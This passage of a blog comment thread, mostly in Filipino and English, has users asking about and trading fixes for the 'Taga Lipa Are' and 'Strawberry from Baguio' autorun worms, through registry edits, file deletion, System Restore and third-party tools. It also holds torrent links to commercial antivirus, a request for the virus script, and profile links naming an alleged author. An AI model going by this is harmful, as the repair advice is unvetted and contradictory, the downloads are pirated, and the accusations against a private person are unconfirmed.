    Has the same effect like the taga lipa but the difference you cannot locate which registry has been added or modified. Some sites suggested to use hijack this and other same utilities.

    Deleting these 2 files is merely impossible because as soon you delete them, they return.

    I need your help Princess in this one. Thanks. You have helped a lot of user. More power!

  96. LRZ Says:

    Zero, A friend and I have been looking on to that a month back, no fixes yet, you could try the manual step of removing it by following this link

    http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FAGENT%2ESPS&VSect=Sn

    Cheers and Goodluck

  97. timothy23 Says:

    HMMMMMMM… thnx for the tips… zero27..But wer can i explore/ find this? =] RECYCLER\S-1-5-21-1078073611-1993962763-839522115-1003
    thnx.. sorry im just a newbie i pc ahihihi!

  98. ferdie Says:

    Natanggal ko na ang “Promise???” virus

    Download lang ng AVG 7.5 then update then scan your computer then go to:

    RUN type mo regedit then try mo hanapin dun s registry under HKEY\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\
    Winlogon\legalNoticeText “promise???” and “I am still waiting for the strawberry coming from my Baguio! Pls.. Help!” delete mo, Then labas ka destop punta ka ng my computer tools folder option then show hidden files pati hide protected operating system then explore ka sa C: delete mo yung exiplorer at autorun, pati s D: then pati sa recycle bin, then restart

    Sana makatulong…

  99. mark Says:

    natangal ko na din ung promise virus sa pc ko.. heheh ,, pero i’m not sure kung gagana ‘to,,, run the regedit then search then type promise, then erase the whole folder…. then, search for the autoruns in your hard disk drives and delete it…..try nu

  100. LRZ Says:

    Ferdie and Mark
    there are more stuff needed to do than just removing its registry entries.

    it’s somewhat connected to somefiles too that needs to be deleted.

    I’ve made a quick fix for all those infected with the ‘BS’ worm :)

    Here’s a link with Full Details
    http://www.convergenceforums.net/e107_plugins/forum/forum_viewtopic.php?17878

    Cheers All

    -Leerz

  101. DavidM Says:

    Hi, I just wanted to say thanks for posting these removal instructions. I’m not what most people would call “computer literate” but I still managed to follow your guide and it worked a treat. Thanks again.

    David

  102. Lei Says:

    Hey, this is a very helpful instruction! Ang dali nyang ifollow hindi gaya nung nakapost sa ibang websites. Salamat!!!

  103. isko Says:

    hi there! please help me to get rid of “im still waiting for strawberry from my Baguio!

  104. onickz Says:

    paano po ba ang pag rereformat sa tuwing ginagamit ko po ang aking cpu bigla po sya nag bublu

  105. chaux Says:

    princess, alam mo b ung ghost virus, ms-dos batch file..ngggwa xa ng folder s halos lhat ng folder..”gy” ung company name..please help my friend, s ngaun ndi ko p nttanggal e..tnx..:)

  106. pohpeht Says:

    Duders,

    why dont you try using Noob_killer it will easily remove “taga lipa are” just 3 clicks (i guess)

    if you want a copy of noob_killer just email me @doux_04@yahoo.com!

    cge mga dude! happy emailing! ^^

  107. Associate in Computer Technology Says:

    Hi Princess, I Love what you have been doing here….

    Anyways about reggies question, what you have there is a very difficult virus, I have encountered it so before and its really difficult to remove. I you want details on how to remove it you could email me at malmangbata@yahoo.com

    By the way princess thanks for the details on removing th Promise??? Script….

  108. onickz Says:

    how to format my computer because my computer is out memory in the middle of my work in my pc. my cpu is turning off after that flash an error report and restart my computer automatically. how to solve it? thank you so much convergence

  109. onickz Says:

    FOR YOU MARK PARA SAYO TO E2 ANG PNAKA LATEST NA ANTI VIRUS TRUST & FRENCY

  110. ambrosia Says:

    ei my script po ba kau nug virus na PROMISE??? ung my script na “im still waiting for the strawberry from baguio”

    ung na run ng exiplorer.exe? ty

  111. jerzs Says:

    mga gago ayaw matanggal eh hahahaha

  112. ligy Says:

    princess,
    i am new here , an i badly need your help guys, yung baguio strawberry virus, nde ko maalis sa pc ko . the problem kasi eh , ayaw gumana ng run —> regedit —> ang nakalagay eh disabled by the task manager .. nde ko tuloy alam ang gagawin ko .. plssss… help me ..

  113. BokBOk Says:

    How can i delete that virusis such as strawberries if my folder option is hidden, even on my control panel the folder option are not display plz help about this situation..

  114. kenshinxian Says:

    wow, pasali naman sa grupo aehehehe ngaun lang ako nakatunton d2 kaso this is the first and the last

  115. applejuice Says:

    Thanks for the info, how about strawberry from baguio?

  116. Regaps Says:

    hello guys!!!!

    Thanks for some info…

    I just want to share this…

    If your pc or external storage(flashdrive, ext. hdd, memory card, etc) is infected with RaVmon.e and autorun.inf, try this…

    Goto command prompt…

    try to use this dos command…

    ex. cd\
    dir c: /ah — to view hidden files
    if you see these files ravmon.exe, autorun.inf
    msv*.dll, fs65*.*
    you cannot delete it , u have to attrib it 1st

    attrib -r -s -h autorun.inf
    del autorun.inf

    use this procedure on other files also… but dont delete system files…

  117. sharona romero Says:

    thank you for the advise… ur site has been very helpful. God bless

  118. magica Says:

    Kaloka naman strawberry from Baguio…To Mark & Ferdie can u please rephrase instruction. But i want to hear princess advice rin about removing “Promise……. “

  119. HAROLD Says:

    HI!

    I have have tired all the steps to delete FS6519.dll.vbs but still all folders seems to auto run.

    I even try loading this :

    http://leerz25.sitesled.com/files/tools/fixes/NOOB_KILLER.by.Leerz.zip

    But still this does’t solve the problem.

    Can anybody help me to solve this problem!!!!

    email me at estrada_harold77@yahoo.com.

    thanks!

    God bless….

  120. Lija-chan Says:

    T_T Stupid viruses…

    I also got the same problem as Mark…that stupid strawberry from Bagiuo message. Arrgh! I’m going to kill myself if this viruses don’t get deleted.

    You think it was transferred from my aunt’s computer? Coz, my computer didn’t had it before.

    And…when I had my vacation in the Philippines, we stayed at my aunt’s. Her computer had that Bagiuo message in it at the startup…and then, lil ole me connected my iPod on the USB port…T_T

    Damn people making stupid fucked up viruses! IDIOTS… -shifty eyes-

  121. ambrosia07 Says:

    ei who has the script of the “PROMISE???” virus can you send it in my email add.. hoy_77@yahoo.com

    ty… iwant to try it to my pc

  122. kenneth Says:

    pucha may bagong virus na pumasok sa pc ko
    actually hindi sya bago ibang version na nmn ng TLA
    hindi lang ung IE title bar ang binabago pati ung
    sa may time nakalagay ORAGON
    ung description ng mga files may oragon

    sinubukan ko nang i run ung noob killerz
    pero ang nattanggal lang eh ung wscript.exe
    pero nandun pa rin

    hindi ko maaus sa regedit kasi pati un naka disable

    puta

  123. redeyes09 Says:

    ui! schoolmate!

    cute mu pla…hehe

    so kilala mu cla helen, angel, reggie at ayann? acm din ata cla.

    BS EM ako, enggsoc. hehe

    apply k naman samen…dami din cs dito! :)

    tenx ulit! glenggleng!

  124. Marvin Says:

    Mga tol ,

    I have a problem about this viruz pls help me or email, to how to remove it. thank people!!!!!

    ” im still waiting strawberry coming from the baguio”

    or just email me
    @marvcph2001@yahoo.com

  125. dr.saurav,assam medical college Says:

    hey guys
    recently i also infected by {taga lipa virus ,hacked by godzila}on internet explore .it has following symptoms
    !
    1.cannot open drive direcrtly through left mouse click
    2.explorer bar shows taga …….lipa ,
    3.also one time hacked by godzila

    tried to remove by norton ,avast ,they cannot even detect it.

    atlast i get rid of following small virus removal tool.
    http://leerz25.sitesled.com/files/tools/fixes/NOOB_KILLER.by.Leerz.zip
    so guys down load and use it …send replies to me

    at following address to know more about it
    hisaurav2000@yahoo.com or call me +919954484551
    i always want to help you .

  126. yadzz Says:

    kakainis tong TAGA LIPA ARE..KUNG NANDITO lang sa harap q ang nag gawa nito poputolan q talaga ng ulo putnag ina..!! punta ka mindanoa…

  127. teejaye Says:

    saklolo po, yung strawberry virus po parang sinira na ung isa kong pc. paano po tanggalin yun, eh yung kay leerz na pang tanggal po sa virus ayaw matanggal heellp. po pleseeeeee….
    ehto po ung e-mail add ko…. Eyajeet@yahoo.com as soon as possible po sana tulungan nyo po ako….
    teejaye

  128. bert Says:

    mga pare… kung may atraso sa inyo yan.. kayo na bahala..
    yan ung gumawa ng taga lipa are.. este di pla ginawa.. inedit lng…….

    http://www.friendster.com/10853035

    yan ung friendster profile nya.. ayt

  129. pam Says:

    hey tnx to all of you

  130. pam Says:

    baket di ma-autorun yung C: ko…

  131. pam Says:

    everytime na clik ko yung drives eto lumalabas

    — cannot find script file FS6519.dll.vbs—

    what shud i do

  132. dualc Says:

    hi everyone,

    after reading those comments mukhang di ko nakita yung “right procedure” of deleting the “PROMISE???… I am still waiting for the strawberry…” na virus na yan. Hayy… help naman po. appreciate your help. tnx ;-)

  133. awttz Says:

    sabe ng iba… strawberry virus.. kalimitan sa mga USB port… specially sa mga flash drive daw… ganun din problem ko e… til now d ko p rin naaalis ang strawberry virus na yan… pakiPOST nmn po ng instruction pra matanggal ang strawberry virus… gawa po kayo new thread… thanks..

  134. rewind88 Says:

    same here, i already tried NOOB_KILLER pero ayaw parin matanggal ng Strawberry… anyway paki post naman yung gumagana… thx. God Bless!!!

  135. RTUGA Says:

    TRY DEEP FREEZING YOUR OS!!!

  136. mark Says:

    how to do deep freezing your os?

  137. mark Says:

    ei.. d rin ngana ung recomend ko about strawberry virus… pro nwala ung s’kin….i don’t know y

  138. rewind88 Says:

    try deleting the “exiplorer” sa system32 ng windows folder then try nyo yung Noob_killer.

  139. rtuga Says:

    DEEP FREEZE ganito: http://www.google.com i-google mo…

  140. rtuga Says:

    Be sure that after fresh install and before you hit
    online, DEEP FREEZE your OS,leave all other installations and games
    on the other partition. You will never need antivirus or anti-anything
    right after each restart, your system will return to it’s initial
    state, fresh and young painlessly. All modifications in the system by the virus
    will be gone.pooff!

  141. Joel Says:

    bigyan nyo po ako ng anti virus bara sa “taga lipa are” please..

  142. cole Says:

    bakit ganun. nawala na tong badtrip na ‘promise???’ na’toh sa laptop ko, tapos nainfect lang ulit… nde ko na magawa yung dating steps para sha matanggal. nasira na yung mga programs ko dito… ayaw na mag-run… nakakaasar lang kasi ang dami kong ginagawa… ngayon pa tinoyo ng todo. paano ko sha maaalis…

  143. daywalker Says:

    i dont know…. ihate all computer…..

  144. daywalker Says:

    reformat mo lahat….save your file to drive d: if naka partation ka….tapos format mo lahat…1 hr lang yan….ok

  145. daywalker Says:

    maraming folder laging nag run paano to ma esolve….give me a nice answer kahit 20 mnts lang paano mo masolve ang maraming folder na alang laman….if e click mo autorun lahat….nakaka sira nang ulo tong folder nato….

  146. daywalker Says:

    gamitin nyo nang deeprezzzz….
    para ala kayong problema….

  147. lipeno Says:

    hayyyy…. mga manggagaya lang… wala ba kaung originality???!!! nkakahiya naman…. ang lam lang e mag-edit lng ng mag-edit…. laoosss na un eee…..! BEAT ME !!!

  148. Ace Says:

    Hi guys,

    Please help me my PC is infected with virus, virus name is strawberry, pag open ko ng pc may window na lumalabas ang nakalagay “i’m still waiting for the strawberry coming in my baguio, please help,” at pag hindi ko na click yng OK na buttom hindi sya tutuloy sa windows, pano ba i remove ito, please! thanks ng marami, marami narin akong ginawang way eh wala talaga, pati sa registry nilinis ko na ganon parin,

    Thanks,

  149. Bongskee Says:

    Hi Princess!

    I need you help … please send ne an email how to remove “i’m still waiting for the strawberry coming in my baguio, please help” Please email me

    Tnx

  150. erick Says:

    badtrip talagang viruz na yan kainis….. salamat sa info try kung gawin sana working 2…. un avg enterprise kasi ala wenta..napapasukan pa din mas ok pa un norton na 2004 professional……

    thanksss uli sa info…

  151. althea Says:

    for those pc masters

    i had virus

    “PROMISE………………………. from bagiou”

    on my pc.

    pls help

    send me instruction in my e-mail at:
    gratelarry@yahoo.com

    tnx

  152. Aja Says:

    In reply to comment #17 (whoa there is a lot)

    Game development. Whoa! Lend me some of your betas, I’ll gladly test them for bugs. :P

    BTW, I made a blog entry on how to remove autorun-driven malware for a lot of my friends experience this kind of infection. Maybe that would somehow help. :)

  153. Aja Says:

    I’ve just read your comment stating, PEBKAC. LOL! I dare not say this to my friends, though. “Error on OSI layer 8″ is a more ambiguous one, I might say. :P

  154. jullieana Says:

    i’ve also got that strawberry virus, kainis! BTW, they are telling that this virus might be from my flash drive, do i need to reformat my flash drive? hope you can help

  155. joan Says:

    1st Disable System Restore under Windows XP:

    Point to Start, Control Panel, Performance and Maintenance. Double-click “System”, then select the System Restore tab. Select the ‘Turn off System Restore” on all drives box. Click Apply. Click Yes. Restart your system [in safe mode].

    2nd restart in safe mode
    As soon as you boot the computer keep clicking F8. THEN choose START in SAFEMODE with networking.

    2nd download
    http://leerz25.sitesled.com/files/tools/fixes/NOOB_KILLER.by.Leerz.zip Then UNZIP.

    3rd

    4th RUN NOOB_KILLER.

    Eh Kasi PINOY TAYO!

    ====== Everyone have a wonderful day.

  156. ron erick Says:

    para sa mga noob na nalagyan ng taga lipa virus….

    all you need to do is to download hijackthis

    type nio lang sa google un tpos punta kau sa mga site dun…

    libre lang un

    run the program tpos hanapin nio ung root na my taga lipa are!

    check nio un tpos ….

    pindutin nio ung addchecked to ignorelist….

    tapos…. tapos na!!!

    wala na un….

    to keep your pc from virus….

    download nio nod32 tpos update nio palagi….

    yan ang astig na anti-virus!

  157. jc Says:

    meron ako technique para matangal yung strawberry virus…
    100% sure gumana sya skn…natatawa ako sa mga solutions nyo…hindi naman gumagana…etong skn, common sense lng ang pinagana ko…magpapasalamat kyo skn for sure dahil dito sa technique ko…100% sure….

    alam nyo kung ano ang solution? i system restore nyo lng…ganon lng ka simple…pinahihirapan nyo pa sarili nyo….nkakatawa tlga kyo…

    for those who dont know how to do it…

    double click

    -my computer
    -control panel
    -performance and maintenance
    -sa left side hanapin nyo sa upper left yun System Restore tpos click nyo yun

    -tpos click nyo restore my computer to an earlier time
    -tpos next nyo
    -tpos click nyo sa calendar yung mga dates na nkahighlight na blue
    -piliin nyo yung mga nakahighlight lng na date na sa tingin nyo nung time na yun wla pang virus yung computer nyo..tpos next nyo lng ng next hangang ipa restart syo ng computer..pgkarestart nyo…wla na yung virus..

    this is 100% sure…magpapasalamat kyo skn dahil dito sa solution ko…im very sure…here is my email para sa mga gustong magpasalamat………jchrnndz@yahoo.com

  158. BRWNEYES Says:

    Sino po may alam pano mawala yung virus na ORAGON INI! ?

    Para din syang TAGA LIPA ARE na nakadispalay sa INTERNET EXPLORER.

    Eto yung nakikita ko sa msconfig –> start-up “MsUpdate.sys.vb”

    Uncheck ko sya sa msconfig yun pa lang ginagawa ko

  159. joan Says:

    its a no brainer for jc… a round of applause for you…. hindi nakakatawa ang solution mo.

    BUT for everyone else who could not do system restore for one reason or another… here is what to do…

    1st Disable System Restore under Windows XP:

    Point to Start, Control Panel, Performance and Maintenance. Double-click “System”, then select the System Restore tab. Select the ‘Turn off System Restore” on all drives box. Click Apply. Click Yes. Restart your system [in safe mode].

    2nd restart in safe mode
    As soon as you boot the computer keep clicking F8. THEN choose START in SAFEMODE with networking.

    2nd download
    http://leerz25.sitesled.com/files/tools/fixes/NOOB_KILLER.by.Leerz.zip Then UNZIP and RUN NOOB_KILLER.

    3rd delete all 3rd party shared folders from your MY NETWORK PLACES. There is a big chance that you got infected from them.

    4th RUN Regedit
    ctrl+f then type exiplorer.exe
    then delete the item that contains this
    after deleting the first item PRESS F3 to go to the next item.

    5th RESTART PC

    6th attach your flash disk then in my computer, right click and choose open instead. Then delete exiplorer.exe and autorun.inf

    BTW, the version i get into has about 6 entries in the registry… nice redundant step.

    Eh Kasi PINOY TAYO!

    ====== Everyone have a wonderful day. and btw, you do not have to thank me for this.

  160. jc Says:

    thanks joan. but no thanks…system restore is the easiest way and it works for me…no need to disable system restore and restarting in safe mode…such a waste of time…maybe it works for you but what im trying to say is that…

    “wag nyo na pahirapan sarili nyo…system restore lng ang solution…yun lng…thanks for the comment joan…

  161. rose Says:

    can anyone help me t0 rem0ve a virus in my profile in friendster?because when im g0nna open my profile it will turn t0 white..and i think i accidentally pressed a free smileys and when im g0nna g0 back in my pr0file it will turn to white…pls i need a help

    -reply ..thnx!!-

  162. ss Says:

    to rose
    delete your frindster account and make a new one…

  163. Computer Security Tips Says:

    Computer Security Tips

    I couldn’t understand some parts of this article, but it sounds interesting

  164. hARdrain Says:

    another thread for the so-called so-weak trojan type “taga-lipa-are”, don’t have to restore don’t have to open regedit, iniatially you just can use the del /f /a:h to delete the file.

    1. Window Key + R
    2. Type cmd > Enter
    3. Go to [DRIVE]: – External / Flash / Usb / What ever! Just find the dir where the file resides.
    4. Type del /f /a:h [FILENAME.VBS]
    5. Be happy.

    - 1 and 0 you mean?

  165. v1p3r13 Says:

    try nyo mcafee download.
    http://www.mininova.org/tor/834719
    d ko po xure .

    Sana maka 2long ^_^

  166. v1p3r13 Says:

    lam ko na panu mwala ung exiplorer.exe!!
    download nyo ung NOOB_KILLER

    run nyo ung dlwang scanner

    pde rin delete nyo muna sa regedit(tignan nyo muna kung nandun pa ung virus kelangan kse) pag nandun pa sundan nyo lang to..
    run>regedit>find mo ung exiplorer.exe tpos delete nyo un

    wag ung buong REG_SZ pag may word na mahaba etc.(ung exiplorer.exe na word lang)
    pag exiplorer.exe lang na word delete nyo ung buong REG_SZ

    then restart
    tpos delete nyo na ung exiplorer.exe

    kung may antivirus kayo…restore nyo
    tpos sundan nyo lang yang guide na yan….
    NOTE:NANDUN DPAT UNG VIRUS SA HARDRIVE NYO BAGO
    NYO DELETE UNG NASA REGISTRY EDITOR….
    pra di na bumalik

    visit my site v1p3r13.blogspot.com
    under construction ehehehe

    SORRY MAGULO NAGMAMADLI ME KSE (PEACE!)
    SANA MAINTINDIHAN KAHIT KONTE

  167. alma mari Says:

    try ko yung system restore tonight ha… ill keep you guys posted… tnx

  168. v1p3r13 Says:

    mali ung guide ni princess kelangan ma delete muna sa registry yun bago nya delete ung virus.tpos need nya ung noob_killer na program

  169. keeno boi Says:

    Thanks for the system restore for Strawberry virus… kainis, sino bang gumawa nito???

  170. jerjay sy Says:

    am i will give the poeple who wants anti-virus AVG 448 i dont know to put anti-virus

  171. jerjay sy Says:

    sana di na sila maglagay ng ”virus” para hindi masira ang mga computer!!! malaki sila perwisyo sa guma gamit ng ”PC” di ba, help po ty po kay princess of antiquity

  172. QpaLiTo Says:

    bdtrep tong taga lipa are buambagaL DSL nmn ghaha

  173. matt Says:

    How can i get rid of ORAGON INI in IE? i have followed the procedure to delete this file FS6519.dll.vbs. But cannot see it after configure the folders to show system, OS and hidden files and file extensions.

  174. Angel Slayer Says:

    pano kung may autorun na sangkatutak ang flashdrive ko, saka yung recycler? pano yun tatanggalin?

  175. neo_drumz Says:

    hello princess!

    I used Norton AV 2007 & Tune Up Utilities 2007 Registry Cleaner. I guess it seemed to have removed d script file coz i cant find it anymore in the registry & i followed your advice in changing the explorer title bar using regedit (thanks for the info by the way it removed that freakin TAGA LIPA ARE coz its been freakin buggin me everytime i open IE!)

    HOWEVER (notice i typed it in bold letters), whenever i click on my hard drive, an error message always appear: Can not find script file “C:\FS6519.dll.vbs”. I have to right click on my HD then click “explore”. Its such a pain in the neck.

    PLEASE HELP ME WITH THIS. I KNOW YOUR A GENIUS IN COMPUTER PROGRAMMING STUFF. THANKS FOR YOUR HELP. I’M SURE A LOT OF PEOPLE ARE GRATEFUL & INDEBTED TO YOUR WORK IN MAKING OUR PC’s “TAGA LIPA ARE”-FREE.

    MORE POWER!

  176. Alexis Pandaan Says:

    For the first time, tinamaan ako ng virus. Are you sure this will work?

  177. Alexis Pandaan Says:

    Alam ko na king sino ang programmer ng virus na yan. Taga STI Lipa siya. Try nyong bisitahin ang friendster niya sa draganta@rock.com.

  178. cashley Says:

    hello!

    im new infected virus…i used avg and mc cafee..but can’t erase the virus…i don’t know what to do…i am new owner computer cafe..at nka network..so 2 computer are infected…

    what i did to do…

    name virus..recycler..codeS-1-5-21-2052111302-113007714-839522115-1003…..

    help me..im from mindoro…

    thanks…

  179. jhoanne Says:

    help me nmn ung comp ko bumabagal nnmn cia nag install ako ng anti virus avast…but nung tumagal bumagal n nakakadetect nmn cia ng virus like trojan and worm pero ngayon di ko lam anong problema pag nagsesearch ako ng mga assignments ko sa internet in yahoo or google iba ang lumalabas puro mga porno and may lumalabas pang anti virus daw cia nagauto install cia sa comp ko but hinaharanggan ng avast..nakukuha ko cia pagnasesearch ako…can u plz help me to fix these….wla akong alam sa comp. nalaman ko lng to web site mo sa frend kong humingi din ng tulong…sna ako din matulungan mo…thank u….

  180. mark Says:

    ei … anyone there that knows how to remove the bacabro virus.. please post..or email me at msfate06@yahoo.com tnx

  181. Jayvee Lim Says:

    salamat. asar kasi ung nag rent d2 sa shop namin, lagyan ba naman nun

  182. v1p3r13 Says:

    kaspersky anti virus ba na try nyo na?
    mininova.com
    for the client bitlord.com

    d ko sure pero eto ginagamit ko ok nmn..

    kung gusto nyo matangal ung
    FS6519.dll.vbs email nyo lang ako.. 13v1p3r13@gmail.com

  183. BlueAngel Says:

    Hi Princess, can you help me on how can i remove Promise! strawberries from baguio virus? thanks and hope you can help me…..

  184. maydee Says:

    so tis f*cking virus would only duplicate some programs on my pc right? di naman siguro to naghahack ng mga files nu???

  185. kimpoy Says:

    ask ko lang..kung pano alisin ung oragon ini…sa tabi nung time sa baba…wala na ung malware pero ung oragon ini sa may oras nandun parin pls..help..thanks….

  186. iloadmachines Says:

    We had this Taga lipa ARE on our computer. We were able to take it out with your instructions. I would like to thank you for making our computing hassle free from juvenile delinquents in the web. More power to you!

  187. mira Says:

    pls help me how to remove this virus

    PROMISE………………………. from bagiou”

    pls

    here’s my email mcminta@yahoo.com

  188. daffy Says:

    tulongan mo naman ako sa problem, its eating my computer badly……please lang po mam/sir i dont know what kind of antivirus gonna fix this kind of problem, kahit yung antivirus nalang, and also this new strawberry virus it also keeps my computer running slow…….please lang po maam/sir

  189. sharona romero Says:

    HI ALDS…..

    actually my laptop was always being affected by the ‘taga lipa are’ your steps/ways to remove it were really efffective. i was able to remove it several times already… but now, it doesnt seem to work.. actually i know that i was skipping a step… i do not know where MS Config is… i cant see it in my start up.. so ive been skipping that step from the start.. maybe that’s the reason why the virus keeps on coming back…

    i know that i sound so stupid for not knowing where the MS Config is.. i really dont know anything about computers, i just know how to use it by surfing the net and making documents. pls help me with this..

    you have been so helpful, i just hope that i am not asking too much from you already..

    thanks. will be waiting for ur reply, if its ok, you may e-mail me you response through sharona_romero@yahoo.com

    thanks again.

  190. francis of cuenca bats. Says:

    di ko po alam pano tanggalin yun taga lipa are at yun fs6519.dll.vbs paki email naman po sakin kung pano tanggalin salamat po asap sa mga taga bats…

  191. kyuketsuki Says:

    i was able to remove “strawberry” without so much complications.. if you want a try jsut follow this…

    In doing this procedure you should login as administrator of your PC.

    1. Right Click My Computer then explore. Look for autorun.inf and Delete this.

    2. Click Start – Run and type regedit. Click HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

    3. Look for LegalNoticeCaption and delete the data “PROMISE???”

    4. Look for LegalNoticeText and delete the data “I am still waiting for the strawberry coming from my baguio! Pls…Help!”

    Then close regedit and restart your computer.

    Note: Just remove the the value data. ok

    Hope this helps to all of you who have this kind of virus.

  192. kyux Says:

    i couldn’t agree more w/ Rom. you should try ubuntu or any other linux OS. i find avast home edition as the most effective free anti-virus. also comodo firewall is your friend.

    kyux


Comments are closed.